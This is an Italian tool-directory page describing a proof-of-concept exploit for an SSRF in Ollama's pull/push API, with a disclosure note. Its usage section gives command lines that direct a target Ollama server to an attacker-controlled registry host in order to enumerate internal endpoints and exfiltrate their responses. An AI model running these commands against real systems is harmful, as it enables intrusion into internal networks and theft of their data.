Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-5530 — Proof-of-concept exploit per CVE-2026-5530, una SSRF nell'API Pull/Push di Ollama, che consente l'enumerazione di endpoint interni e l'esfiltrazione completa delle risposte tramite un registro OCI rogue. | Kitploit
Strumenti/GitHubGitHub/davidrxchester/cve-2026-5530
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebEsfiltrazione DatiRaccolta Informazioni
GitHubdavidrxchester/cve-2026-5530

CVE-2026-5530

Proof-of-concept exploit per CVE-2026-5530, una SSRF nell'API Pull/Push di Ollama, che consente l'enumerazione di endpoint interni e l'esfiltrazione completa delle risposte tramite un registro OCI rogue.

Vedi Repository
265 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-5530

SSRF su Ollama tramite reindirizzamento del registro OCI con esfiltrazione completa della risposta.

Writeup: https://davidrochester.com/posts/cve-2026-5530

Divulgazione

Ollama è stato contattato più volte senza ricevere risposta.

Utilizzo

Tre modalità: enum, exfil e probe.

Enum

Trova endpoint interni attivi raggiungibili dall'host Ollama.

python3 poc.py targets.txt --registry-host <your-ip>

Exfil

Esfiltra le risposte SSRF quando conosci la dimensione della risposta.

python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>

Probe

Cerca automaticamente la dimensione della risposta con ricerca binaria, poi esfiltra.

python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>

Opzioni

target              URL o file di URL (uno per riga, # per commenti)
-p, --port          porta del registro rogue (default: 9999)
--exfil-port        porta del registro di esfiltrazione (default: 10000)
--exfil             modalità esfil, richiede --size
--probe             ricerca binaria per la dimensione, poi esfil
--size              Content-Length (richiesto con --exfil)
--registry-host     il tuo IP/hostname dell'attaccante che Ollama può raggiungere
--ollama            URL API Ollama (default: http://127.0.0.1:11434)
Scarica lo strumento